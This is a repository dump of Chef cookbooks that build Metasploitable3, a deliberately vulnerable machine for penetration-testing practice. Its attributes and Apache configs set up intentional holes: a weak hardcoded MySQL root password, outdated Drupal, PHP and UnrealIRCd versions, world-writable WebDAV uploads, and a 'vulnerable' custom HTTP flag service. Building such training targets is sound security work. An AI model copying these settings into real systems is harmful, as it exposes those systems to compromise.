IFACE!=lo) 4 | stop on runlevel [!2345] 5 | limit nofile 524288 1048576 6 | limit nproc 524288 1048576 7 | 8 | respawn 9 | 10 | kill timeout 20 11 | 12 | pre-start script 13 | # see also https://github.com/tianon/cgroupfs-mount/blob/master/cgroupfs-mount 14 | if grep -v '^#' /etc/fstab | grep -q cgroup \ 15 | || [ ! -e /proc/cgroups ] \ 16 | || [ ! -d /sys/fs/cgroup ]; then 17 | exit 0 18 | fi 19 | if ! mountpoint -q /sys/fs/cgroup; then 20 | mount -t tmpfs -o uid=0,gid=0,mode=0755 cgroup /sys/fs/cgroup 21 | fi 22 | ( 23 | cd /sys/fs/cgroup 24 | for sys in $(awk '!/^#/ { if ($4 == 1) print $1 }' /proc/cgroups); do 25 | mkdir -p $sys 26 | if ! mountpoint -q $sys; then 27 | if ! mount -n -t cgroup -o $sys cgroup $sys; then 28 | rmdir $sys || true 29 | fi 30 | fi 31 | done 32 | ) 33 | end script 34 | 35 | script 36 | # modify these in /etc/default/$UPSTART_JOB (/etc/default/docker) 37 | if [ -f /etc/default/$UPSTART_JOB ]; then 38 | . /etc/default/$UPSTART_JOB 39 | fi 40 | exec <%= @docker_daemon_cmd %> <%= @docker_raw_logs_arg %> 41 | end script 42 | 43 | post-start script 44 | <%= @docker_wait_ready %> 45 | if [ $? -eq 0 ]; then 46 | echo "<%= @docker_socket %> is up" 47 | else 48 | echo "<%= @docker_socket %> failed to start" 49 | exit 1 50 | fi 51 | end script 52 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/attributes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: iptables 3 | # Attribute:: default 4 | # 5 | # Copyright:: 2016, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the "License"); 8 | # you may not use this file except in compliance with the License. 9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an "AS IS" BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | default['iptables']['iptables_sysconfig'] = { 21 | 'IPTABLES_MODULES' => '', 22 | 'IPTABLES_MODULES_UNLOAD' => 'yes', 23 | 'IPTABLES_SAVE_ON_STOP' => 'no', 24 | 'IPTABLES_SAVE_ON_RESTART' => 'no', 25 | 'IPTABLES_SAVE_COUNTER' => 'no', 26 | 'IPTABLES_STATUS_NUMERIC' => 'yes', 27 | 'IPTABLES_STATUS_VERBOSE' => 'no', 28 | 'IPTABLES_STATUS_LINENUMBERS' => 'yes', 29 | } 30 | default['iptables']['ip6tables_sysconfig'] = { 31 | 'IP6TABLES_MODULES' => '', 32 | 'IP6TABLES_MODULES_UNLOAD' => 'yes', 33 | 'IP6TABLES_SAVE_ON_STOP' => 'no', 34 | 'IP6TABLES_SAVE_ON_RESTART' => 'no', 35 | 'IP6TABLES_SAVE_COUNTER' => 'no', 36 | 'IP6TABLES_STATUS_NUMERIC' => 'yes', 37 | 'IP6TABLES_STATUS_VERBOSE' => 'no', 38 | 'IP6TABLES_STATUS_LINENUMBERS' => 'yes', 39 | } 40 | 41 | default['iptables']['system_ruby'] = '/usr/bin/ruby' 42 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/recipes/_package.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: iptables 3 | # Recipe:: _package 4 | # 5 | # Copyright:: 2008-2016, Chef Software, Inc. 6 | # 7 | # Licensed under the Apache License, Version 2.0 (the "License"); 8 | # you may not use this file except in compliance with the License. 9 | # You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, software 14 | # distributed under the License is distributed on an "AS IS" BASIS, 15 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | # See the License for the specific language governing permissions and 17 | # limitations under the License. 18 | # 19 | 20 | # amazon linux, any fedora, and amazon linux 2 21 | if (platform_family?('rhel') && node['platform_version'].to_i == 7) || 22 | (platform_family?('amazon') && node['platform_version'].to_i < 2013) || 23 | platform_family?('fedora') 24 | package 'iptables-services' 25 | else 26 | package 'iptables' 27 | if platform_family?('debian') 28 | # Since Ubuntu 10.04LTS and Debian6, this package takes over the automatic loading of the saved iptables rules 29 | package 'iptables-persistent' 30 | end 31 | end 32 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/resources/rule6.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Author:: Julien 'Lta' BALLET 3 | # Cookbook:: iptables 4 | # Resource:: rule6 5 | # 6 | # Copyright:: 2018, Chef Software, Inc. 7 | # 8 | # Licensed under the Apache License, Version 2.0 (the "License"); 9 | # you may not use this file except in compliance with the License. 10 | # You may obtain a copy of the License at 11 | # 12 | # http://www.apache.org/licenses/LICENSE-2.0 13 | # 14 | # Unless required by applicable law or agreed to in writing, software 15 | # distributed under the License is distributed on an "AS IS" BASIS, 16 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 17 | # See the License for the specific language governing permissions and 18 | # limitations under the License. 19 | 20 | property :source, String 21 | property :cookbook, String 22 | property :variables, Hash, default: {} 23 | property :lines, String 24 | property :table, Symbol 25 | property :filemode, [String, Integer], default: '0644' 26 | 27 | action :enable do 28 | iptables_rule new_resource.name do 29 | ipv6 true 30 | source new_resource.source 31 | cookbook new_resource.cookbook 32 | variables new_resource.variables 33 | lines new_resource.lines 34 | table new_resource.table 35 | sensitive new_resource.sensitive 36 | filemode new_resource.filemode 37 | action :enable 38 | end 39 | end 40 | 41 | action :disable do 42 | iptables_rule new_resource.name do 43 | ipv6 true 44 | source new_resource.source 45 | cookbook new_resource.cookbook 46 | variables new_resource.variables 47 | lines new_resource.lines 48 | table new_resource.table 49 | sensitive new_resource.sensitive 50 | filemode new_resource.filemode 51 | action :disable 52 | end 53 | end 54 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/templates/default/iptables-config.erb: -------------------------------------------------------------------------------- 1 | # This file managed by Chef. Do not hand edit 2 | <% @config.each do |k,v| -%> 3 | <%= k %>="<%= v %>" 4 | <% end -%> 5 | -------------------------------------------------------------------------------- /chef/cookbooks/iptables/templates/default/iptables_load.erb: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | <%= @iptables_restore_binary %> < <%= @iptables_save_file %> 3 | exit 0 4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/.kitchen.yml: -------------------------------------------------------------------------------- 1 | --- 2 | driver: 3 | name: vagrant 4 | synced_folders: 5 | - [<%= File.join(ENV['PWD'], '..', '..')%>, '/tmp/repo-data'] 6 | 7 | provisioner: 8 | name: chef_zero 9 | encrypted_data_bag_secret_key_path: 'secrets/fakey-mcfakerton' 10 | data_bags_path: './data_bags' 11 | 12 | platforms: 13 | - name: ubuntu-16.04 14 | - name: centos-7.2 15 | 16 | suites: 17 | - name: default 18 | run_list: 19 | - recipe[delivery_build::default] 20 | - recipe[test] 21 | attributes: 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/Berksfile: -------------------------------------------------------------------------------- 1 | source 'https://supermarket.chef.io' 2 | 3 | metadata 4 | 5 | group :delivery do 6 | cookbook 'delivery_build', git: 'https://github.com/chef-cookbooks/delivery_build' 7 | cookbook 'delivery-base', git: 'https://github.com/chef-cookbooks/delivery-base' 8 | cookbook 'test', path: './test/fixtures/cookbooks/test' 9 | end 10 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2017 The Authors 2 | 3 | All rights reserved, do not redistribute. 4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/chefignore: -------------------------------------------------------------------------------- 1 | # Put files/directories that should be ignored in this file when uploading 2 | # to a chef-server or supermarket. 3 | # Lines that start with '# ' are comments. 4 | 5 | # OS generated files # 6 | ###################### 7 | .DS_Store 8 | Icon? 9 | nohup.out 10 | ehthumbs.db 11 | Thumbs.db 12 | 13 | # SASS # 14 | ######## 15 | .sass-cache 16 | 17 | # EDITORS # 18 | ########### 19 | \#* 20 | .#* 21 | *~ 22 | *.sw[a-z] 23 | *.bak 24 | REVISION 25 | TAGS* 26 | tmtags 27 | *_flymake.* 28 | *_flymake 29 | *.tmproj 30 | .project 31 | .settings 32 | mkmf.log 33 | 34 | ## COMPILED ## 35 | ############## 36 | a.out 37 | *.o 38 | *.pyc 39 | *.so 40 | *.com 41 | *.class 42 | *.dll 43 | *.exe 44 | */rdoc/ 45 | 46 | # Testing # 47 | ########### 48 | .watchr 49 | .rspec 50 | spec/* 51 | spec/fixtures/* 52 | test/* 53 | features/* 54 | examples/* 55 | Guardfile 56 | Procfile 57 | .kitchen* 58 | .rubocop.yml 59 | spec/* 60 | Rakefile 61 | .travis.yml 62 | .foodcritic 63 | .codeclimate.yml 64 | 65 | # SCM # 66 | ####### 67 | .git 68 | */.git 69 | .gitignore 70 | .gitmodules 71 | .gitconfig 72 | .gitattributes 73 | .svn 74 | */.bzr/* 75 | */.hg/* 76 | */.svn/* 77 | 78 | # Berkshelf # 79 | ############# 80 | Berksfile 81 | Berksfile.lock 82 | cookbooks/* 83 | tmp 84 | 85 | # Policyfile # 86 | ############## 87 | Policyfile.rb 88 | Policyfile.lock.json 89 | 90 | # Cookbooks # 91 | ############# 92 | CONTRIBUTING* 93 | CHANGELOG* 94 | TESTING* 95 | MAINTAINERS.toml 96 | 97 | # Strainer # 98 | ############ 99 | Colanderfile 100 | Strainerfile 101 | .colander 102 | .strainer 103 | 104 | # Vagrant # 105 | ########### 106 | .vagrant 107 | Vagrantfile 108 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/data_bags/keys/delivery_builder_keys.json: -------------------------------------------------------------------------------- 1 | {"id": "delivery_builder_keys"} -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'build_cookbook' 2 | maintainer 'The Authors' 3 | maintainer_email 'you@example.com' 4 | license 'all_rights' 5 | version '0.1.0' 6 | 7 | depends 'delivery-truck' 8 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: default 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::default' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/deploy.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: deploy 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::deploy' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/functional.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: functional 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::functional' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/lint.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: lint 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::lint' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/provision.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: provision 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::provision' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/publish.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: publish 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::publish' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/quality.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: quality 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::quality' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/security.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: security 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::security' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/smoke.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: smoke 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::smoke' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/syntax.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: syntax 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::syntax' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/recipes/unit.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: build_cookbook 3 | # Recipe:: unit 4 | # 5 | # Copyright:: 2017, The Authors, All Rights Reserved. 6 | include_recipe 'delivery-truck::unit' 7 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/secrets/fakey-mcfakerton: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/.delivery/build_cookbook/secrets/fakey-mcfakerton -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/test/fixtures/cookbooks/test/metadata.rb: -------------------------------------------------------------------------------- 1 | name 'test' 2 | version '0.1.0' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/build_cookbook/test/fixtures/cookbooks/test/recipes/default.rb: -------------------------------------------------------------------------------- 1 | %w(unit lint syntax).each do |phase| 2 | # TODO: This works on Linux/Unix. Not Windows. 3 | execute "HOME=/home/vagrant delivery job verify #{phase} --server localhost --ent test --org kitchen" do 4 | cwd '/tmp/repo-data' 5 | user 'vagrant' 6 | end 7 | end 8 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/config.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "2", 3 | "build_cookbook": { 4 | "name": "build_cookbook", 5 | "path": ".delivery/build_cookbook" 6 | }, 7 | "skip_phases": [], 8 | "job_dispatch": { 9 | "version": "v2" 10 | }, 11 | "dependencies": [] 12 | } 13 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.delivery/project.toml: -------------------------------------------------------------------------------- 1 | # Delivery Prototype for Local Phases Execution 2 | # 3 | # The purpose of this file is to prototype a new way to execute 4 | # phases locally on your workstation. The delivery-cli will read 5 | # this file and execute the command(s) that are configured for 6 | # each phase. You can customize them by just modifying the phase 7 | # key on this file. 8 | # 9 | # By default these phases are configured for Cookbook Workflow only 10 | # 11 | # As this is still a prototype we are not modifying the current 12 | # config.json file and it will continue working as usual. 13 | 14 | [local_phases] 15 | unit = "chef exec rspec spec/" 16 | lint = "chef exec cookstyle" 17 | # Foodcritic includes rules only appropriate for community cookbooks 18 | # uploaded to Supermarket. We turn off any rules tagged "supermarket" 19 | # by default. If you plan to share this cookbook you should remove 20 | # '-t ~supermarket' below to enable supermarket rules. 21 | syntax = "chef exec foodcritic . --exclude spec -f any -t ~supermarket" 22 | provision = "chef exec kitchen create" 23 | deploy = "chef exec kitchen converge" 24 | smoke = "chef exec kitchen verify" 25 | # The functional phase is optional, you can define it by uncommenting 26 | # the line below and running the command: `delivery local functional` 27 | # functional = "" 28 | cleanup = "chef exec kitchen destroy" 29 | 30 | # Remote project.toml file 31 | # 32 | # Specify a remote URI location for the `project.toml` file. 33 | # This is useful for teams that wish to centrally manage the behavior 34 | # of the `delivery local` command across many different projects. 35 | # 36 | # remote_file = "https://url/project.toml" 37 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.gitignore: -------------------------------------------------------------------------------- 1 | .vagrant 2 | *~ 3 | *# 4 | .#* 5 | \#*# 6 | .*.sw[a-z] 7 | *.un~ 8 | 9 | # Bundler 10 | Gemfile.lock 11 | bin/* 12 | .bundle/* 13 | 14 | # test kitchen 15 | .kitchen/ 16 | .kitchen.local.yml 17 | 18 | # Chef 19 | Berksfile.lock 20 | .zero-knife.rb 21 | Policyfile.lock.json 22 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/.kitchen.yml: -------------------------------------------------------------------------------- 1 | --- 2 | driver: 3 | name: vagrant 4 | 5 | provisioner: 6 | name: chef_zero 7 | # You may wish to disable always updating cookbooks in CI or other testing environments. 8 | # For example: 9 | # always_update_cookbooks: <%= !ENV['CI'] %> 10 | always_update_cookbooks: true 11 | 12 | verifier: 13 | name: inspec 14 | 15 | platforms: 16 | - name: ubuntu-16.04 17 | - name: centos-7.2 18 | 19 | suites: 20 | - name: default 21 | run_list: 22 | - recipe[metasploitable::default] 23 | verifier: 24 | inspec_tests: 25 | - test/smoke/default 26 | attributes: 27 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/Berksfile: -------------------------------------------------------------------------------- 1 | source 'https://supermarket.chef.io' 2 | 3 | metadata 4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/README.md: -------------------------------------------------------------------------------- 1 | # metasploitable 2 | 3 | TODO: Enter the cookbook description here. 4 | 5 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/apache_continuum.rb: -------------------------------------------------------------------------------- 1 | default[:apache_continuum][:install_dir] = '/opt/apache_continuum' 2 | default[:apache_continuum][:download_url] = 'http://archive.apache.org/dist/continuum/binaries' 3 | default[:apache_continuum][:tar] = 'apache-continuum-1.4.2-bin.tar.gz' 4 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/default.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Attributes:: default 4 | # 5 | default[:metasploitable][:docker_users] = ['boba_fett', 6 | 'jabba_hutt', 7 | 'greedo', 8 | 'chewbacca',] 9 | 10 | default[:metasploitable][:files_path] = '/vagrant/chef/cookbooks/metasploitable/files/' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/drupal.rb: -------------------------------------------------------------------------------- 1 | default[:drupal][:files_path] = File.join(default[:metasploitable][:files_path], 'drupal') 2 | default[:drupal][:install_dir] = '/var/www/html/drupal' 3 | default[:drupal][:sites_dir] = File.join(default[:drupal][:install_dir], 'sites') 4 | default[:drupal][:all_site_dir] = File.join(default[:drupal][:sites_dir], 'all') 5 | default[:drupal][:default_site_dir] = File.join(default[:drupal][:sites_dir], 'default') 6 | default[:drupal][:version] = '7.5' 7 | default[:drupal][:download_url] = 'https://ftp.drupal.org/files/projects' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/flags.rb: -------------------------------------------------------------------------------- 1 | # 2 | # Cookbook:: metasploitable 3 | # Attributes:: flags 4 | # 5 | 6 | default[:flags][:five_of_diamonds][:vuln_service] = 'custom_http' 7 | default[:flags][:five_of_diamonds][:vuln_port] = '8989' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/mysql.rb: -------------------------------------------------------------------------------- 1 | default[:mysql][:root_password] = 'sploitme' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/php545.rb: -------------------------------------------------------------------------------- 1 | default[:php545][:download_url] = 'http://museum.php.net/php5/' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/proftpd.rb: -------------------------------------------------------------------------------- 1 | default[:proftpd][:download_url] = 'ftp://ftp.proftpd.org/distrib/source' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/attributes/unrealircd.rb: -------------------------------------------------------------------------------- 1 | default[:unrealircd][:files_path] = File.join(default[:metasploitable][:files_path], 'drupal') 2 | default[:unrealircd][:install_dir] = '/opt/unrealircd' 3 | default[:unrealircd][:download_url] = 'https://www.exploit-db.com/apps' -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/chefignore: -------------------------------------------------------------------------------- 1 | # Put files/directories that should be ignored in this file when uploading 2 | # to a chef-server or supermarket. 3 | # Lines that start with '# ' are comments. 4 | 5 | # OS generated files # 6 | ###################### 7 | .DS_Store 8 | Icon? 9 | nohup.out 10 | ehthumbs.db 11 | Thumbs.db 12 | 13 | # SASS # 14 | ######## 15 | .sass-cache 16 | 17 | # EDITORS # 18 | ########### 19 | \#* 20 | .#* 21 | *~ 22 | *.sw[a-z] 23 | *.bak 24 | REVISION 25 | TAGS* 26 | tmtags 27 | *_flymake.* 28 | *_flymake 29 | *.tmproj 30 | .project 31 | .settings 32 | mkmf.log 33 | 34 | ## COMPILED ## 35 | ############## 36 | a.out 37 | *.o 38 | *.pyc 39 | *.so 40 | *.com 41 | *.class 42 | *.dll 43 | *.exe 44 | */rdoc/ 45 | 46 | # Testing # 47 | ########### 48 | .watchr 49 | .rspec 50 | spec/* 51 | spec/fixtures/* 52 | test/* 53 | features/* 54 | examples/* 55 | Guardfile 56 | Procfile 57 | .kitchen* 58 | .rubocop.yml 59 | spec/* 60 | Rakefile 61 | .travis.yml 62 | .foodcritic 63 | .codeclimate.yml 64 | 65 | # SCM # 66 | ####### 67 | .git 68 | */.git 69 | .gitignore 70 | .gitmodules 71 | .gitconfig 72 | .gitattributes 73 | .svn 74 | */.bzr/* 75 | */.hg/* 76 | */.svn/* 77 | 78 | # Berkshelf # 79 | ############# 80 | Berksfile 81 | Berksfile.lock 82 | cookbooks/* 83 | tmp 84 | 85 | # Policyfile # 86 | ############## 87 | Policyfile.rb 88 | Policyfile.lock.json 89 | 90 | # Cookbooks # 91 | ############# 92 | CONTRIBUTING* 93 | CHANGELOG* 94 | TESTING* 95 | MAINTAINERS.toml 96 | 97 | # Strainer # 98 | ############ 99 | Colanderfile 100 | Strainerfile 101 | .colander 102 | .strainer 103 | 104 | # Vagrant # 105 | ########### 106 | .vagrant 107 | Vagrantfile 108 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/cgi-bin.conf: -------------------------------------------------------------------------------- 1 | 2 | 3 | Define ENABLE_CGI_BIN 4 | 5 | 6 | 7 | Define ENABLE_CGI_BIN 8 | 9 | 10 | 11 | ScriptAlias /cgi-bin/ /var/www/cgi-bin/ 12 | 13 | AllowOverride None 14 | Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch 15 | Order allow,deny 16 | Allow from all 17 | 18 | 19 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/dav.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Distributed authoring and versioning (WebDAV) 3 | # 4 | # Required modules: mod_dav, mod_dav_fs, mod_setenvif, mod_alias 5 | # mod_auth_digest, mod_authn_file 6 | # 7 | 8 | # The following example gives DAV write access to a directory called 9 | # "uploads" under the ServerRoot directory. 10 | # 11 | # The User/Group specified in httpd.conf needs to have write permissions 12 | # on the directory where the DavLockDB is placed and on any directory where 13 | # "Dav On" is specified. 14 | 15 | Alias /uploads "/var/www/uploads" 16 | 17 | 18 | AllowOverride All 19 | Dav On 20 | 21 | 22 | Order Allow,Deny 23 | Allow from all 24 | 25 | 26 | 27 | # 28 | # The following directives disable redirects on non-GET requests for 29 | # a directory that does not include the trailing slash. This fixes a 30 | # problem with several clients that do not appropriately handle 31 | # redirects for folders with DAV methods. 32 | # 33 | BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully 34 | BrowserMatch "MS FrontPage" redirect-carefully 35 | BrowserMatch "^WebDrive" redirect-carefully 36 | BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully 37 | BrowserMatch "^gnome-vfs/1.0" redirect-carefully 38 | BrowserMatch "^XML Spy" redirect-carefully 39 | BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/hello_world.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | printf "Content-type: text/html\n\n" 3 | printf "Hello World!\n" -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/php5.conf: -------------------------------------------------------------------------------- 1 | 2 | SetHandler application/x-httpd-php 3 | 4 | 5 | SetHandler application/x-httpd-php-source 6 | Order Deny,Allow 7 | Deny from all 8 | 9 | 10 | Order Deny,Allow 11 | Deny from all 12 | 13 | 14 | 15 | php_admin_flag engine Off 16 | 17 | 18 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache/php5.load: -------------------------------------------------------------------------------- 1 | LoadModule php5_module /usr/lib/apache2/modules/libphp5.so 2 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/apache_continuum/data.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/apache_continuum/data.tar.gz -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/chatbot/chatbot.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/chatbot/chatbot.zip -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/drupal/default_site.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/drupal/default_site.tar.gz -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/10_of_clubs.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/10_of_clubs.wav -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/2_of_spades.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/2_of_spades.pcapng -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/5_of_hearts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/5_of_hearts.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/7_of_diamonds.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/7_of_diamonds.zip -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/8_of_hearts.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/8_of_hearts.zip -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | MAINTAINER Metasploitable "msfdev@rapid7.com" 3 | 4 | ADD 7_of_diamonds.zip /home/7_of_diamonds.zip 5 | 6 | WORKDIR /home -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/five_of_diamonds: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/five_of_diamonds -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/five_of_diamonds_srv: -------------------------------------------------------------------------------- 1 | description 'Run vulnerable custom http on 8989' 2 | author 'metasploitable3' 3 | 4 | start on runlevel [2345] 5 | exec "/opt/knock_knock/five_of_diamonds" 6 | -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/flag_images/10 of spades.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/flag_images/10 of spades.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/flag_images/3 of hearts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/flag_images/3 of hearts.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/flag_images/8 of clubs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rapid7/metasploitable3/b3442cc893fe4fa5a63a8ec95267ab4ee9881c5c/chef/cookbooks/metasploitable/files/flags/flag_images/8 of clubs.png -------------------------------------------------------------------------------- /chef/cookbooks/metasploitable/files/flags/joker.png: -------------------------------------------------------------------------------- 